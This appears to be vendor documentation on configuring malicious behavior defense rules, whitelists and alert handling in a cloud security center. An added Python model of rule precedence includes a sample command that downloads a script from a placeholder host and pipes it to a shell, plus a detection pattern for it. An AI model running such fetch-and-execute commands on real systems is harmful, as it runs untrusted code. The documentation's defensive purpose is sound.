
Security Center:Malicious behavior defense

Last Updated:Dec 03, 2024

Malicious behavior defense is a network security mechanism aimed at identifying, blocking, and responding to various forms of malicious activities. This topic introduces how to effectively use malicious behavior defense to protect your servers from attacks and threats.

Scenarios

Malicious behavior defense supports system defense rules and custom defense rules. The following table describes the scenarios for which the two types of rules are suitable:

Important

Custom defense rules are assigned a higher priority than system defense rules.

Rule Type

Scenarios

System defense rule

  • Defense against common attacks

    Common attacks are automatically blocked. You can disable a system defense rule or change the servers to which a system defense rule is applied to minimize false alerts.

  • False alert handling

    If you handle an alert event whose alert type is Precise defense and you determine that the processes detected and reported by Security Center based on a system defense rule are normal and are required for your workloads, you can disable the rule on the System Defense Rule tab of the Malicious Behavior Defense tab. You can also remove the affected servers from the list of servers on which the rule takes effect.

Custom defense rule

If you want to allow or block specific behavior, you can use the Custom Defense Rule to create custom defense rules based on your business scenarios. For more information about the examples of custom defense rules, see Best practices for configuring custom defense rules by using the malicious behavior defense feature.

Manage system defense rules

Security Center automatically enables all system defense rules in the Advanced, Enterprise, and Ultimate editions.

  1. Log on to the Security Center console. In the top navigation bar, select the region of the asset that you want to manage. The following regions are supported: China and Outside China.

  2. In the left-side navigation pane, choose Protection Configuration > Host Protection > Host-specific Rule Management.

  3. On the System Defense Rule tab of the Malicious Behavior Defense tab, find and manage a system defense rule.

    Search for a system defense rule

    • On the System Defense Rule tab, enter the name of the system defense rule in the search box.

    • On the System Defense Rule tab, select a value in the ATT&CK Phase section to filter rules.

    Manage a system defense rule

    • Enable or disable a system defense rule

      If a system defense rule is not suitable for your business scenario and affects the security score of your assets, you can disable the rule.

      Important

      After you disable a system defense rule, Security Center no longer detects or reports risks based on the rule. The alert events that are generated based on the rule are no longer displayed on the Alerts page. Proceed with caution.

      1. Select one or more system defense rules.

      2. In the lower-left corner of the rule list, click Enable or Disable.

    • Manage servers to which a system defense rule is applied

      Important

      After you remove a server from a system defense rule, Security Center no longer detects or reports risks on the server based on the rule. Proceed with caution.

      1. Find the system defense rule that you want to manage and click Manage Host in the Actions column.

      2. In the Host Management panel, add servers to the rule or remove servers from the rule. Then, click OK.

Manage custom defense rules

If Security Center generates alerts for your normal service requests, you can create a custom defense rule to add specific behavior to the whitelist. For example, you can add behavior of the Command line and process hash types to the whitelist.

  1. Log on to the Security Center console. In the upper-left corner of the console, select the region where the assets to be protected are located: China or Outside China.

  2. In the left-side navigation pane, select Protection Configuration > Host Protection > Host-specific Rule Management.

  3. On the Custom Defense Rule tab of the Malicious Behavior Defense tab, click Create Whitelist Rule.

  4. In the Create Whitelist Rule panel, configure the Rule Type parameter, the required parameters, and the Action parameter based on your business requirements. Then, click Next.

    The required parameters vary based on the value of the Rule Type parameter. If you want to add specific behavior to the whitelist, make sure that the Rule Type parameter for the defense rule uses one of the following values:

    • Process hash

    • Command line

    • Process Network

    • File Read and Write

    • Operation on Registry

    • Dynamic-link Library Loading

    • File Renaming

    For more information, see Best practices for configuring custom defense rules by using the malicious behavior defense feature.

    Note

    You can add only behavior of the Process hash type to the blacklist.

  5. In the server list in the Create Whitelist Rule panel, select the servers on which you want the rule to take effect and click Complete.

    By default, a new custom defense rule is enabled. You can manage the servers on which the rule takes effect.
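The precedence and scoping semantics described in the system defense rule and custom defense rule sections above (custom rules outrank system rules, a rule takes effect only on the servers in its list, a disabled rule never matches, and only the Process hash type may be blacklisted), as an added Python model that is not Security Center's own code. The server names, the event, the process hash and the rule name Allow backup agent are constructed; only Suspicious worm script behavior is a name from this page.

```python
from dataclasses import dataclass
from hashlib import sha256

# Constructed model of the rule semantics described on this page; it is not
# Security Center's own code. Custom rules are checked before system rules,
# a rule matches only on servers in its list, and a disabled rule never matches.
WHITELIST_TYPES = {"process_hash", "command_line", "process_network",
                   "file_read_write", "registry", "dll_loading", "file_renaming"}
BLACKLIST_TYPES = {"process_hash"}   # only process hashes may be blacklisted

@dataclass
class Rule:
    name: str
    kind: str        # "system" or "custom"
    rule_type: str   # one of WHITELIST_TYPES
    pattern: str     # full hash, or a substring of the command line
    action: str      # "allow" (whitelist) or "block" (blacklist)
    servers: set     # servers on which the rule takes effect
    enabled: bool = True

    def __post_init__(self):
        allowed = WHITELIST_TYPES if self.action == "allow" else BLACKLIST_TYPES
        if self.kind == "custom" and self.rule_type not in allowed:
            raise ValueError(f"{self.rule_type} cannot be used with action {self.action}")

def matches(rule, server, event):
    if not rule.enabled or server not in rule.servers:
        return False
    if rule.rule_type == "process_hash":
        return event["hash"] == rule.pattern
    if rule.rule_type == "command_line":
        return rule.pattern in event["cmdline"]
    return False   # other rule types are not modelled here

def decide(rules, server, event):
    """Return (action, rule name); ('allow', None) when no rule matches."""
    for kind in ("custom", "system"):   # custom rules have higher priority
        for rule in rules:
            if rule.kind == kind and matches(rule, server, event):
                return rule.action, rule.name
    return "allow", None

# Constructed sample: a system rule that blocks piped shell scripts, and a
# custom whitelist entry for a known process hash on one server only.
EVENT = {"cmdline": "curl http://updates.invalid/run.sh | sh",
         "hash": sha256(b"constructed-backup-agent").hexdigest()}
SYSTEM_RULE = Rule("Suspicious worm script behavior", "system", "command_line",
                   "| sh", "block", {"web-01", "web-02"})
CUSTOM_ALLOW = Rule("Allow backup agent", "custom", "process_hash",
                    EVENT["hash"], "allow", {"web-01"})
```

Calling decide([SYSTEM_RULE, CUSTOM_ALLOW], server, EVENT) returns allow on web-01 (custom whitelist wins), block on web-02 (system rule applies) and allow with no rule on db-01 (outside both server lists).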

View and handle alert events

After you configure a malicious behavior defense rule, Security Center automatically blocks malicious behavior that matches the rule and generates alerts based on the rule. To view and handle alert events, perform the following operations:

  1. Log on to the Security Center console. In the top navigation bar, select the region of the asset that you want to manage. The following regions are supported: China and Outside China.

  2. In the left-side navigation pane, select CTDR > Alert.

  3. On the Alert page, select the Cloud Workload Protection Platform (CWPP) tab, and click the number below Precise Defense.


  4. In the list of alert events, view the alert events that are generated for automatically blocked risks. If an alert event is a false positive, click Details in the Actions column to handle the alert event.

    In this example, the alert event that is generated for the alert named Suspicious worm script behavior is handled.

    In the alert details panel, obtain and record the following information for subsequent use.

    • The name of the system defense rule that detected the risks for which the alert event is generated. In this example, the name of the system defense rule is Malicious Damage To Client Processes.

    • The value of ATT&CK Phase for the alert event. In this example, the value is Impact and Damage.

    • The names and IP addresses of the servers that are affected by the alert event.


  5. In the left-side navigation pane, select Protection Configuration > Host Protection > Host-specific Rule Management.

  6. On the Host defense rules tab, search for the system defense rule based on which the alert event is generated.

    • You can enter Suspicious worm script behavior in the search box.

    • You can also click Damage in the ATT&CK Phase section of the Host defense rules tab.

  7. Manage the Suspicious worm script behavior system defense rule.

    • If the system defense rule is not suitable for your business scenario and you no longer want Security Center to generate alert events based on the system defense rule, you can click the switch icon in the Switch column to disable the rule.

      Important

      After you disable a system defense rule, Security Center no longer detects risks or generates alert events based on the rule. The alert events that are generated based on the rule are no longer displayed on the Alerts page. Proceed with caution.

    • If you want to handle an alert event that is a false positive, you can click Actions in the Manage Host column and remove the servers that are affected from the server list of the rule.

      You can also find and handle the false positive alert event on the Alerts page. For more information, see View and handle alert events.

      Important

      If you want the system defense rule to continue protecting your server, you can add the server to the server list on the Malicious Behavior Defense tab after you handle the alert event.